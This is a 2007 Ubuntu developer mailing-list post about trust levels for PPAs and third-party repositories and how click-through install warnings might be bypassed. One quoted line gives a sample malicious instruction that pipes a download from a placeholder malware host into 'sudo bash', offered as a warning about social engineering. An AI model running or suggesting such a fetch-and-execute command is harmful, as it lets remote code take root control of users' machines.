Untrusted software and security click-through warnings

Bryce Harrington bryce at bryceharrington.org
Fri Sep 28 21:42:58 BST 2007

On Fri, Sep 28, 2007 at 12:14:48PM -0700, Kees Cook wrote:
> On Fri, Sep 28, 2007 at 03:56:31PM +0100, Ian Jackson wrote:
> >  * Yes, click-through addition of PPAs whose uploaders we bless
> >     and for which someone will provide security support
> It seems that some knowledge of who owns a PPA should factor into the key
> management for that PPA.  For example, someone who isn't MOTU shouldn't
> get automatic installation of packages onto users' systems from "main".

> Right, that sort of language might help, but dedicated 3rd parties that
> don't want to get involved in the Ubuntu development community will
> still find ways to bypass it:
>    "Select  Applications / Accessories / Terminal
>     In the window type
>       wget -O - http://malware.example.com/happy-goodness | sudo bash
>     and type in your password when prompted."

Agreed - there is a risk here of by making things too strict, we could
inadvertantly end up dumping the baby with the bathwater and making
users get overly accustomed to this approach.
> I'm hoping the simple lack of click-through installations will be a
> strong enough deterrent.

I'm not so sure.  While in general most users will be scared off by
having to type something with more than 2 pieces of punctuation into a
terminal window, consider gamers.  Commercial proprietary games are a
problem we *want* to have on Ubuntu, since that'll be one of the signs
of the coming Windows apocalypse.  Gamers may not know more than the
novice user, but they may be less deterred by the obscurity of the
installation mechanism.  The lure of installing the latest demo
or random shareware game downloaded off the web can be quite strong, and
young gamers can be quite willing to take unwise risks.

The use of separate "3PA" repos is a better solution in this context -
assuming we can get game companies to make use of them.

> > But the alternative is that in 5 years' time our users' systems will
> > be malware-infested nightmares.
> I think we need to separate the discussion of "3rd Party Applications"
> and "Malware".  While Malware is technically 3PA, I think there is a
> technical and philosophical difference between the two, in that most
> 3PAs are making software to help a subset of users, and Malware to take
> advantage of a subset of users.  There is, obviously, a continuum:
> - Ubuntu repository software (QC'd via Debian & ubuntu-*dev, Safe, Free)
> - PPA repository software (less QC, less Safe, contractually Free)
> - 3PA repository software (lesser QC, less Safe, unknown Freedom)
> - 3PA non-repository software (least QC, unsafe, non-Free)
> - Malware (no QC, dangerous, non-Free)

More information about the ubuntu-devel mailing list